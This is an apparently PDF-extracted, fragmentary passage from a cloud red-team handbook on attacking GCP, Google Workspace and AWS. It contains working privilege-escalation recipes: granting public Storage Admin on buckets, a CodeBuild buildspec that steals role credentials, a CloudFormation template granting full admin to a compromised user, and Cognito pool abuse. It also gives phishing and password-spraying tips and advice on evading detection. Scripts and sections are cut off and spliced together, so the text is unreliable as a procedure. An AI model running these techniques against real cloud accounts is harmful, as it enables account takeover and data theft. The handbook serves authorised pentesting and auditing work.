# Write logs
# An attacker writing logs may confuse the Blue Team
gcloud logging write [LOG_NAME] [MESSAGE]
# List Buckets
gcloud logging buckets list
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
This can be a MAJOR vector for privilege escalation, as those buckets can
contain secrets.
Privesc
In the following page you can check how to abuse storage permissions to
escalate privileges:
gcp-storage-privesc.md
############################
# Run this tool to find buckets that are open to the public
# anywhere in your GCP organization.
#
# Enjoy!
############################
if [ -z "$all_users" ]
then
:
else
echo "[!] Open to all users: $bucket"
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users:
$bucket"
fi
done
done
Note that other cloud resources could be searched for, and sometimes
these resources are hidden behind subdomains that point to them via a
CNAME record.
Public Resources Brute-Force
Buckets, Firebase, Apps & Cloud Functions
https://github.com/initstring/cloud_enum: This tool in GCP brute-force
Buckets, Firebase Realtime Databases, Google App Engine sites, and
Cloud Functions
https://github.com/0xsha/CloudBrute: This tool in GCP brute-force
Buckets and Apps.
Buckets
As in other clouds, GCP also offers Buckets to its users. These buckets might
be publicly accessible (allowing anyone to list the content, read, write...).
The following tools can be used to generate variations of the given name
and search for misconfigured buckets with those names:
https://github.com/RhinoSecurityLabs/GCPBucketBrute
If you find that you can access a bucket you might be able to escalate even
further, check:
gcp-public-buckets-privilege-escalation.md
Check Permissions
There are 2 ways to check the permissions over a bucket. The first one is to
ask for them by making a request to
https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam or running
gsutil iam get gs://BUCKET_NAME .
The other option which will always work is to use the testPermissions
endpoint of the bucket to figure out if you have the specified permission,
for example accessing:
https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update
Escalating
With the “gsutil” Google Storage CLI program, we can run the following
command to grant “allAuthenticatedUsers” access to the “Storage Admin”
role, thus escalating the privileges we were granted over the bucket:
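A sketch of that command (the bucket name is a placeholder; shorthand role names such as admin may also be accepted):
gsutil iam ch allAuthenticatedUsers:roles/storage.admin gs://<bucket-name>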
Hangout Phishing
You might be able to either directly talk with a person just having their
email address, or send an invitation to talk. Either way, you can modify an
email account, maybe naming it "Google Security" and adding some Google
logos, and people will think they are talking to Google:
https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s
OAuth Phishing
Any of the previous techniques might be used to make the user access a
Google OAuth application that will request the user some access. If the
user trusts the source he might trust the application (even if it's asking for
high privileged permissions).
Note that Google presents an ugly prompt warning that the
application is untrusted in several cases, and Workspace admins can even
prevent people from accepting OAuth applications. More on this in the OAuth
section.
Password Spraying
In order to test passwords against all the emails you found (or that you have
generated based on an email name pattern you might have discovered) you can
use a tool like https://github.com/ustayready/CredKing which uses
AWS Lambdas to change the IP address.
Oauth Apps
Google allows creating applications that can interact on behalf of users with
several Google services: Gmail, Drive, GCP...
Interesting Scopes
Here you can find a list of all the Google OAuth scopes.
However, even if the app isn't verified there are a couple of ways to not
show that prompt:
This means that the creator of the document will appear as the creator of
any App Script anyone with editor access creates inside of it.
This also means that the App Script will be trusted by the Workspace
environment of the creator of the document.
This also means that if an App Script already existed and people have
granted access, anyone with Editor permission on the doc can modify it
and abuse that access. To abuse this you also need people to trigger the
App Script, and one neat trick is to publish the script as a web app: when
the people that already granted access to the App Script access the web
page, they will trigger the App Script (this also works using
<img> tags).
Post-Exploitation
Google Groups Privesc
By default in Workspace a group can be freely accessed by any member of
the organization. Workspace also allows granting permissions to groups
(even GCP permissions), so if groups can be joined and they have extra
permissions, an attacker may abuse that path to escalate privileges.
You potentially need access to the console to join groups that allow being
joined by anyone in the org. Check the groups information in
https://groups.google.com/all-groups.
Contacts download
From https://contacts.google.com you can download all the contacts of
the user.
Cloudsearch
In https://cloudsearch.google.com/ you can just search through all the
Workspace content (email, drive, sites...) a user has access to. Ideal to
quickly find sensitive information.
Currents
In https://currents.google.com/ you can access a Google Chat, so you
might find sensitive information in there.
Google Drive Mining
When sharing a document you can specify the people that can access it one
by one, share it with your entire company (or with some specific groups),
or generate a link.
When sharing a document, in the advanced settings you can also allow people
to search for this file (by default this is disabled). However, it's important
to note that once a user views a document, it's searchable by them.
For the sake of simplicity, most people will generate and share a link
instead of adding the people that can access the document one by one.
Keep Notes
In https://keep.google.com/ you can access the notes of the user, sensitive
information might be saved in here.
Administrate Workspace
In https://admin.google.com/, you might be able to modify the Workspace
settings of the whole organization if you have enough permissions.
You can also find emails by searching through all the user's invoices in
https://admin.google.com/ac/emaillogsearch
Account Compromised Recovery
Log out of all sessions
Change user password
Generate new 2FA backup codes
Remove App passwords
Remove OAuth apps
Remove 2FA devices
Remove email forwarders
Remove email filters
Remove recovery email/phones
Remove bad Android Apps
Remove bad account delegations
References
https://www.youtube-nocookie.com/embed/6AsVUS79gLw - Matthew
Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
https://www.youtube.com/watch?v=KTVHLolz6cE - Mike Felch and
Beau Bullock - OK Google, How do I Red Team GSuite?
Concepts such as organization hierarchy, IAM and other basic concepts are
explained in:
aws-basic-information
Labs to learn
https://github.com/RhinoSecurityLabs/cloudgoat
https://hackingthe.cloud/aws/capture_the_flag/cicdont/
https://github.com/BishopFox/iam-vulnerable
http://flaws.cloud/
http://flaws2.cloud/
https://github.com/nccgroup/sadcloud
https://github.com/bridgecrewio/terragoat
https://github.com/ine-labs/AWSGoat
AWS Pentester/Red Team
Methodology
In order to audit an AWS environment it's very important to know: which
services are being used, what is being exposed, who has access to what,
and how internal AWS services and external services are connected.
From a Red Team point of view, the first step to compromising an AWS
environment is to obtain some credentials. Here you have some
ideas on how to do that:
C:\Users\USERNAME\.aws\credentials
aws-unauthenticated-enum-access
Or if you are doing a review you could just ask for credentials with these
roles:
aws-permissions-for-a-pentest.md
After you have managed to obtain credentials, you need to know who
those creds belong to and what they have access to, so you need to perform
some basic enumeration:
Basic Enumeration
SSRF
If you found a SSRF in a machine inside AWS check this page for tricks:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
Whoami
One of the first things you need to know is who you are (in where account
you are in other info about the AWS env):
# Easiest way, but might be monitored?
aws sts get-caller-identity
aws iam get-user # This will get your own user
# From metadata
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document
Note that companies might use canary tokens to identify when tokens are
being stolen and used. It's recommended to check if a token is a canary
token or not before using it.\ For more info check this page.
Org Enumeration
# Get Org
aws organizations describe-organization
aws organizations list-roots
# Get accounts
## List all the accounts without caring about the parent
aws organizations list-accounts
## Accounts from a parent
aws organizations list-accounts-for-parent --parent-id r-lalala
aws organizations list-accounts-for-parent --parent-id ou-n8s9-
8nzv3a5y
IAM Enumeration
If you have enough permissions checking the privileges of each entity
inside the AWS account will help you understand what you and other
identities can do and how to escalate privileges.
If you don't have enough permissions to enumerate IAM, you can still
brute-force them to figure them out. Check how to do the enumeration
and brute-forcing in:
aws-iam-and-sts-enum
Now that you have some information about your credentials (and, if you
are a red team, hopefully you haven't been detected), it's time to figure out
which services are being used in the environment. In the following section
you can check some ways to enumerate some common services.
Services Enumeration, Post-
Exploitation & Persistence
AWS has an astonishing amount of services. In the following page you will
find basic information, enumeration cheatsheets, how to avoid
detection, obtain persistence, and other post-exploitation tricks about
some of them:
aws-services
Note that you don't need to perform all the work manually, below in this
post you can find a section about automatic tools.
aws-unauthenticated-enum-access
Privilege Escalation
If you can check at least your own permissions over different resources
you could check if you are able to obtain further permissions. You
should focus at least in the permissions indicated in:
aws-privilege-escalation
Publicly Exposed Services
While enumerating AWS services you might have found some of them
exposing elements to the Internet (VM/Container ports, databases or
queue services, snapshots or buckets...). As a pentester/red teamer you
should always check if you can find sensitive information / vulnerabilities
in them as they might provide you further access into the AWS account.
In this book you can find information about how to find exposed AWS
services and how to check them. For finding vulnerabilities in
exposed network services I would recommend searching for the
specific service in:
https://book.hacktricks.xyz/
Compromising the Organization
From the root account
When the management account creates new accounts in the organization, a
new role is created in the new account, by default named
OrganizationAccountAccessRole, which gives the AdministratorAccess policy
to the management account to access the new account.
You cannot find the name of the roles directly, so check all the
custom IAM policies and search any allowing sts:AssumeRole
# Install
gem install aws_recon
# Enumerate
python3 cloudmapper.py collect --profile dev
## Number of resources discovered
python3 cloudmapper.py stats --accounts dev
# Identify admins
## The permissions search for are in https://github.com/duo-
labs/cloudmapper/blob/4df9fd7303e0337ff16a08f5e58f1d46047c4a87/
shared/iam_audit.py#L163-L175
python3 cloudmapper.py find_admins --accounts dev
# Install
pip install cartography
## At the time of this writing you need neo4j version 3.5.*
# Get data
pmapper --profile dev graph create
pmapper --profile dev graph display # Show basic info
# Generate graph
pmapper --profile dev visualize # Generate svg graph file (can
also be png, dot and graphml)
pmapper --profile dev visualize --only-privesc # Only privesc
permissions
# Generate analysis
pmapper --profile dev analysis
## Run queries
pmapper --profile dev query 'who can do iam:CreateUser'
pmapper --profile dev query 'preset privesc *' # Get privescs
with admins
Audit
cloudsploit: CloudSploit by Aqua is an open-source project designed
to allow detection of security risks in cloud infrastructure accounts,
including: Amazon Web Services (AWS), Microsoft Azure, Google
Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub
(It doesn't look for ShadowAdmins).
./index.js --csv=file.csv --console=table --config ./config.js
# Install
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout --help
# Get info
scout aws -p dev
# Checks
./prowler -p dev
cs-suite: Cloud Security Suite (uses python2.7 and looks
unmaintained)
Zeus: Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail /
CloudWatch / KMS best hardening practices (looks unmaintained). It
checks only default configured creds inside the system.
Constant Audit
cloud-custodian: Cloud Custodian is a rules engine for managing
public cloud accounts and resources. It allows users to define policies
to enable a well managed cloud infrastructure, that's both secure
and cost optimized. It consolidates many of the adhoc scripts
organizations have into a lightweight and flexible tool, with unified
metrics and reporting.
pacbot: Policy as Code Bot (PacBot) is a platform for continuous
compliance monitoring, compliance reporting and security
automation for the cloud. In PacBot, security and compliance
policies are implemented as code. All resources discovered by PacBot
are evaluated against these policies to gauge policy conformance. The
PacBot auto-fix framework provides the ability to automatically
respond to policy violations by taking predefined actions.
streamalert: StreamAlert is a serverless, real-time data analysis
framework which empowers you to ingest, analyze, and alert on data
from any environment, using data sources and alerting logic you
define. Computer security teams use StreamAlert to scan terabytes of
log data every day for incident detection and response.
DEBUG: Capture AWS cli requests
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
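The proxy's CA won't be trusted by the CLI, so you'll likely also need one of the following (the CA path is a placeholder):
aws sts get-caller-identity --no-verify-ssl
# or point the CLI at the proxy's CA certificate
export AWS_CA_BUNDLE=/path/to/proxy-ca.pem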
Accounts
In AWS there is a root account, which is the parent container for all the
accounts of your organization. However, you don't need to use that
account to deploy resources; you can create other accounts to separate
different AWS infrastructures.
The management account (the root account) is the account that you
use to create the organization. From the organization's management
account, you can do the following:
Organization Units
Accounts can be grouped in Organization Units (OU). This way, you can
create policies for the Organization Unit that are going to be applied to all
the children accounts. Note that an OU can have other OUs as children.
Note that SCPs only restrict the principals in the account, so other
accounts are not affected. This means having an SCP deny s3:GetObject
will not stop people from accessing a public S3 bucket in your account.
SCP examples: preventing security services from being disabled or their
configuration from being modified.
ARN
The Amazon Resource Name is the unique name every resource inside AWS
has; it's composed like this:
arn:partition:service:region:account-id:resource-type/resource-
id
arn:aws:elasticbeanstalk:us-west-
1:123456789098:environment/App/Env
Note that there are 4 partitions in AWS but only 3 ways to call them:
From a security point of view, it's recommended to create other users and
avoid using this one.
IAM users
An IAM user is an entity that you create in AWS to represent the person
or application that uses it to interact with AWS. A user in AWS consists
of a name and credentials (password and up to two access keys).
Users can have MFA enabled to log in through the console. API tokens of
MFA-enabled users aren't protected by MFA. If you want to restrict
access to a user's API keys using MFA, you need to indicate in the policy
that in order to perform certain actions MFA needs to be present (example
below).
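A sketch of such a policy (a deny-unless-MFA statement; the policy name and excluded actions are just examples):
cat > require_mfa.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAllExceptListedIfNoMFA",
      "Effect": "Deny",
      "NotAction": ["iam:ChangePassword", "sts:GetSessionToken"],
      "Resource": "*",
      "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}}
    }
  ]
}
EOF
aws iam create-policy --policy-name RequireMFA --policy-document file://require_mfa.json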
CLI
Access Key ID: 20 random uppercase alphanumeric characters like
AKHDNAPO86BSHKDIRYT
Secret access key ID: 40 random upper and lowercase characters:
S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to
retrieve lost secret access key IDs).
Whenever you need to change the Access Key this is the process you
should follow: create a new access key -> apply the new key to the
system/application -> mark the original one as inactive -> test and verify the new
access key is working -> delete the old access key.
You can attach an identity-based policy to a user group so that all of the
users in the user group receive the policy's permissions. You cannot
identify a user group as a Principal in a policy (such as a resource-
based policy) because groups relate to permissions, not authentication, and
principals are authenticated IAM entities.
A user group can contain many users, and a user can belong to
multiple groups.
User groups can't be nested; they can contain only users, not other
user groups.
There is no default user group that automatically includes all users
in the AWS account. If you want to have a user group like that, you
must create it and assign each new user to it.
The number and size of IAM resources in an AWS account, such as the
number of groups, and the number of groups that a user can be a
member of, are limited. For more information, see IAM and AWS STS
quotas.
IAM roles
An IAM role is very similar to a user, in that it is an identity with
permission policies that determine what it can and cannot do in AWS.
However, a role does not have any credentials (password or access keys)
associated with it. Instead of being uniquely associated with one person, a
role is intended to be assumable by anyone who needs it (and have
enough perms). An IAM user can assume a role to temporarily take on
different permissions for a specific task. A role can be assigned to a
federated user who signs in by using an external identity provider instead
of IAM.
Policies
Policy Permissions
Policy permissions are used to assign permissions to identities. There are 2 types:
Inline Policies
This kind of policy is directly assigned to a user, group or role. It does not
appear in the Policies list and no other identity can use it. Inline
policies are useful if you want to maintain a strict one-to-one relationship
between a policy and the identity that it's applied to. For example, you
want to be sure that the permissions in a policy are not inadvertently
assigned to an identity other than the one they're intended for. When you
use an inline policy, the permissions in the policy cannot be inadvertently
attached to the wrong identity. In addition, when you use the AWS
Management Console to delete that identity, the policies embedded in the
identity are deleted as well. That's because they are part of the principal
entity.
If a principal does not have an explicit deny on them, and a resource policy
grants them access, then they are allowed.
IAM Boundaries
IAM boundaries can be used to limit the permissions a user should have
access to. This way, even if a different set of permissions is granted to the
user by a different policy, the operation will fail if he tries to use them.
Boundaries, SCPs and following the least privilege principle are the ways to
ensure that users don't have more permissions than the ones they need.
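For reference, a boundary is attached like this (the user name and managed policy are just examples):
aws iam put-user-permissions-boundary \
    --user-name someuser \
    --permissions-boundary arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess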
Multi-Factor Authentication
It's used to add an additional factor for authentication on top of
your existing methods, such as a password, therefore creating a multi-factor
level of authentication. You can use a free virtual application or a
physical device. For example, you can use apps like Google Authenticator for free to
activate MFA in AWS.
Identity Federation
Identity federation allows users from identity providers that are
external to AWS to access AWS resources securely without having to
supply AWS user credentials from a valid IAM user account. An example
of an identity provider can be your own corporate Microsoft Active
Directory (via SAML) or OpenID services (like Google). Federated access
will then allow the users within it to access AWS. AWS Identity Federation
connects via IAM roles.
Trust Relations
AD Admin Center
Full PS API support
AD Recycle Bin
Group Managed Service Accounts
Schema Extensions
No Direct access to OS or Instances
IAM ID Prefixes
In this page you can find the IAM ID prefixes of keys depending on their
nature:
arn:aws:iam::aws:policy/SecurityAudit
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess
codebuild:ListProjects
config:Describe*
cloudformation:ListStacks
logs:DescribeMetricFilters
directconnect:DescribeConnections
dynamodb:ListTables
Misc
CLI Authentication
In order for a regular user to authenticate to AWS via the CLI you need to have
local credentials. By default you can configure them manually in
~/.aws/credentials or by running aws configure. In that file you can
have more than one profile; if no profile is specified when using the aws cli, the
one called [default] in that file will be used. Example of a credentials file
with more than 1 profile:
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
aws_secret_access_key = uOcdhof683fbOUGFYEQug8fUGIf68greoihef
[Admin]
aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
If you need to access different AWS accounts and your profile was given
access to assume a role inside those accounts, you don't need to manually
call STS every time ( aws sts assume-role --role-arn <role-arn> ... );
instead you can configure a profile in ~/.aws/config that assumes the role
automatically:
[profile acc2]
region=eu-west-2
role_arn=arn:aws:iam::<account-id>:role/<role-path>
role_session_name = <session_name>
source_profile = <profile_with_assume_role>
sts_regional_endpoints = regional
With this config file you can then use aws cli like:
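For instance (any command works; the role from the acc2 profile is assumed transparently):
aws sts get-caller-identity --profile acc2
aws s3 ls --profile acc2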
If you are looking for something similar to this but for the browser you can
check the extension AWS Extend Switch Roles.
https://book.hacktricks.xyz/pentesting-web/saml-attacks
5. Create a new role with the permissions the github action needs and a
trust policy that trusts the provider, like:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "token.actions.githubusercontent.com:sub": [
                        "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
                        "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
                    ],
                    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}
jobs:
read-dev:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
This policy correctly indicates that only the EKS cluster with id
20C159CDF6F2349B68846BEC03BE031B can assume the role. However, it's
not indicating which service account can assume it, which means that ANY
service account with a web identity token is going to be able to assume
the role. To specify which service account should be able to, a condition
like the following is needed:
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
References
https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-
actions-with-oidc/
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<acc_id>:role/priv-role"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
The role priv-role in this case doesn't need to be specifically given
permission to assume that role (that allowance in the trust policy is enough).
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<acc_id>:root"
},
"Action": "sts:AssumeRole",
"Condition": {}
}
]
}
If you try to assume a role from a different account, the assumed role
must allow it (indicating the role ARN or the external account), and the
role trying to assume the other one MUST have permissions to assume
it (in this case this isn't optional, even if the assumed role specifies an
ARN).
Confused Deputy Problem
If you allow an external account (A) to access a role in your account, you
will probably have zero visibility on who exactly can access that external
account. This is a problem, because if another external account (B) can
access the external account (A), it's possible that B will also be able to
access your account. To mitigate this, the trusting account can require the
external account to present an ExternalId when assuming the role.
However, note that this ExternalId "secret" is not a secret: anyone that
can read the IAM assume role policy will be able to see it. But as long as
the external account A knows it and the external account B doesn't, it
prevents B from abusing A to access your role.
Example:
{
"Version": "2012-10-17",
"Statement": {
"Effect": "Allow",
"Principal": {
"AWS": "Example Corp's AWS Account ID"
},
"Action": "sts:AssumeRole",
"Condition": {
"StringEquals": {
"sts:ExternalId": "12345"
}
}
}
}
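Example Corp would then assume the role presenting that ExternalId, something like:
aws sts assume-role \
    --role-arn arn:aws:iam::<your-account-id>:role/<role-name> \
    --role-session-name example \
    --external-id 12345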
References
https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-
deputy.html
AWS has hundreds (if not thousands) of permissions that an entity can be
granted. In this book you can find all the permissions that I know that you
can abuse to escalate privileges, but if you know some path not mentioned
here, please share it.
Apigateway Privesc
Codebuild Privesc
Codepipeline Privesc
Codestar Privesc
Cloudformation Privesc
Cognito Privesc
Datapipeline Privesc
DynamoDB Privesc
EBS Privesc
EC2 Privesc
ECR Privesc
ECS Privesc
EFS Privesc
EMR Privesc
Glue Privesc
IAM Privesc
KMS Privesc
Lambda Privesc
Lightsail Privesc
MQ Privesc
MSK Privesc
RDS Privesc
Redshift Privesc
S3 Privesc
Sagemaker Privesc
Secrets Privesc
SSM Privesc
STS Privesc
Misc (Other Techniques) Privesc
Tools
https://github.com/RhinoSecurityLabs/Security-
Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
Pacu
References
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-
mitigation-part-2/
https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-
mitigation/
https://bishopfox.com/blog/privilege-escalation-in-aws
https://hackingthe.cloud/aws/exploitation/local-priv-esc-user-data-s3/
Potential Impact: You cannot privesc with this technique but you might
get access to sensitive info.
apigateway:GET
With this permission you can get generated API keys of the APIs
configured (per region).
Potential Impact: You cannot privesc with this technique but you might
get access to sensitive info.
JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n
build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/service-
role/codebuild-CI-Build-service-role-2\"
}"
REV_PATH="/tmp/rev.json"
echo "$JSON" > "$REV_PATH" # write the project definition referenced below
# Create project
aws codebuild create-project --cli-input-json file://$REV_PATH
# Build it
aws codebuild start-build --project-name codebuild-demo-project
iam:PassRole ,
codebuild:UpdateProject ,
( codebuild:StartBuild |
codebuild:StartBuildBatch )
Just like in the previous section, if instead of creating a build project you
can modify it, you can indicate the IAM Role and steal the token:
REV="envn - curl
http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
aws-datapipeline-codepipeline-codebuild-and-codecommit.md
iam:PassRole ,
codepipeline:CreatePipeline ,
codebuild:CreateProject,
codepipeline:StartPipelineExecution
When creating a code pipeline you can indicate a codepipeline IAM Role
to run, therefore you could compromise them.
Apart from the previous permissions you would need access to the place
where the code is stored (S3, ECR, github, bitbucket...)
I tested this doing the process in the web page; the permissions indicated
previously are the non-List/Get ones needed to create a codepipeline, but for
creating it in the web you will also need:
codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects,
codebuild:ListRepositories, codecommit:ListRepositories,
events:PutTargets, codepipeline:ListPipelines, events:PutRule,
codepipeline:ListActionTypes, cloudtrail:<several>
During the creation of the build project you can indicate a command to
run (rev shell?) and to run the build phase as privileged user, that's the
configuration the attacker needs to compromise:
? codebuild:UpdateProject,
codepipeline:UpdatePipeline,
codepipeline:StartPipelineExecution
It might be possible to modify the role used and the command executed on
a codepipeline with the previous permissions.
codestar-createproject-codestar-associateteammember.md
iam:PassRole ,
codestar:CreateProject
With these permissions you can abuse a codestar IAM Role to perform
arbitrary actions through a cloudformation template. Check the
following page:
iam-passrole-codestar-createproject.md
codestar:CreateProject ,
codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a codestar project,
and codestar:AssociateTeamMember to make an IAM user the owner of a
new CodeStar project, which will grant them a new policy with a few
extra permissions.
PROJECT_NAME="supercodestar"
If you are already a member of the project you can use the permission
codestar:UpdateTeamMember to update your role to owner instead of
codestar:AssociateTeamMember
Potential Impact: Privesc to the codestar policy generated. You can find an
example of that policy in:
codestar-createproject-codestar-associateteammember.md
codestar:CreateProjectFromTemplate
1. Use codestar:CreateProjectFromTemplate to create a new project.
i. You will be granted access to cloudformation:UpdateStack on a
stack that has the “CodeStarWorker-<project name>-CloudFormation” IAM
role passed to it.
2. Use the CloudFormation permissions to update the target stack with a
CloudFormation template of your choice.
i. The name of the stack that needs to be updated will be
“awscodestar-<project name>-infrastructure” or “awscodestar-<project name>-lambda”,
depending on what template is used (in the example exploit script,
at least).
At this point, you would now have full access to the permissions granted to
the CloudFormation IAM role. You won’t be able to get full administrator
with this alone; you’ll need other misconfigured resources in the
environment to help you do that.
"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner"
]
},
{
"Sid": "2",
"Effect": "Allow",
"Action": [
"codestar:DescribeUserProfile",
"codestar:ListProjects",
"codestar:ListUserProfiles",
"codestar:VerifyServiceRole",
"cloud9:DescribeEnvironment*",
"cloud9:ValidateEnvironmentName",
"cloudwatch:DescribeAlarms",
"cloudwatch:GetMetricStatistics",
"cloudwatch:ListMetrics",
"codedeploy:BatchGet*",
"codedeploy:List*",
"codestar-connections:UseConnection",
"ec2:DescribeInstanceTypeOfferings",
"ec2:DescribeInternetGateways",
"ec2:DescribeNatGateways",
"ec2:DescribeRouteTables",
"ec2:DescribeSecurityGroups",
"ec2:DescribeSubnets",
"ec2:DescribeVpcs",
"events:ListRuleNamesByTarget",
"iam:GetAccountSummary",
"iam:GetUser",
"iam:ListAccountAliases",
"iam:ListRoles",
"iam:ListUsers",
"lambda:List*",
"sns:List*"
],
"Resource": [
"*"
]
},
{
"Sid": "3",
"Effect": "Allow",
"Action": [
"codestar:*UserProfile",
"iam:GenerateCredentialReport",
"iam:GenerateServiceLastAccessedDetails",
"iam:CreateAccessKey",
"iam:UpdateAccessKey",
"iam:DeleteAccessKey",
"iam:UpdateSSHPublicKey",
"iam:UploadSSHPublicKey",
"iam:DeleteSSHPublicKey",
"iam:CreateServiceSpecificCredential",
"iam:UpdateServiceSpecificCredential",
"iam:DeleteServiceSpecificCredential",
"iam:ResetServiceSpecificCredential",
"iam:Get*",
"iam:List*"
],
"Resource": [
"arn:aws:iam::947247140022:user/${aws:username}"
]
}
]
}
To exploit this you need to create a S3 bucket that is accessible from the
attacked account. Upload a file called toolchain.json . This file should
contain the cloudformation template exploit. The following one can be
used to set a managed policy to a user under your control and give it admin
permissions:
toolchain.json
{
"Resources": {
"supercodestar": {
"Type": "AWS::IAM::ManagedPolicy",
"Properties": {
"ManagedPolicyName": "CodeStar_supercodestar",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
},
"Users": [
"<compromised username>"
]
}
}
}
}
An empty zip file (empty.zip) must also be uploaded to the bucket.
Remember that the bucket with both files must be accessible by the
victim account.
With both things uploaded you can now proceed to the exploitation
creating a codestar project:
PROJECT_NAME="supercodestar"
aws-cloudformation-and-codestar-enum.md
iam:PassRole ,
cloudformation:CreateStack
An attacker with the iam:PassRole and cloudformation:CreateStack permissions would be able to escalate privileges by creating a stack with an arbitrary template, passing a privileged cloudformation role to it.
In the following page you have an exploitation example with the additional
permission cloudformation:DescribeStacks :
iam-passrole-cloudformation-createstack-and-cloudformation-
describestacks.md
iam:PassRole ,
( cloudformation:UpdateStack |
cloudformation:SetStackPolicy )
In this case you can abuse an existing cloudformation stack to update it
and escalate privileges as in the previous scenario:
cloudformation:UpdateStack |
cloudformation:SetStackPolicy
If you have this permission but no iam:PassRole you can still update the
stacks used and abuse the IAM Roles they have already attached. Check
the previous section for exploit example (just don't indicate any role in the
update).
iam:PassRole ,
(( cloudformation:CreateChangeSet ,
cloudformation:ExecuteChangeSet ) |
cloudformation:SetStackPolicy )
An attacker with permissions to pass a role and create & execute a
ChangeSet can create/update a new cloudformation stack abuse the
cloudformation service roles just like with the CreateStack or
UpdateStack.
--change-set-type UPDATE
iam:PassRole ,
( cloudformation:CreateStackSet |
cloudformation:UpdateStackSet )
An attacker could abuse these permissions to create/update StackSets to
abuse arbitrary cloudformation roles.
cloudformation:UpdateStackSet
An attacker could abuse this permission without the passRole permission to
update StackSets to abuse the attached cloudformation roles.
Wait for a couple of minutes for the stack to be generated and then get the
output of the stack where the credentials are stored:
aws cloudformation describe-stacks \
    --stack-name arn:aws:cloudformation:us-west-2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \
    --region us-west-2
References
https://bishopfox.com/blog/privilege-escalation-in-aws
aws-cognito-enum
cognito-
identity:SetIdentityPoolRoles ,
iam:PassRole
With this permission you can grant any cognito role to the
authenticated/unauthenticated users of the cognito app.
aws cognito-identity set-identity-pool-roles \
--identity-pool-id <identity_pool_id> \
--roles unauthenticated=<role ARN>
# Get credentials
## Get one ID
aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
## Get creds for that id
aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
If the cognito app doesn't have unauthenticated users enabled you might
need also the permission cognito-identity:UpdateIdentityPool to
enable it.
cognito-identity:UpdateIdentityPool
An attacker with this permission could set for example a Cognito User Pool
under his control or any other identity provider where he can login as a way
to access this Cognito Identity Pool. Then, just login on that user provider
will allow him to access the configured authenticated role in the
Identity Pool.
# This example is using a Cognito User Pool as identity
provider
## but you could use any other identity provider
aws cognito-identity update-identity-pool \
--identity-pool-id <value> \
--identity-pool-name <value> \
[--allow-unauthenticated-identities | --no-allow-
unauthenticated-identities] \
--cognito-identity-providers ProviderName=user-pool-
id,ClientId=client-id,ServerSideTokenCheck=false
# Now you need to login to the User Pool you have configured
## after having the id token of the login continue with the
following commands:
Potential Impact: Privesc to other Cognito groups or even all the Cognito
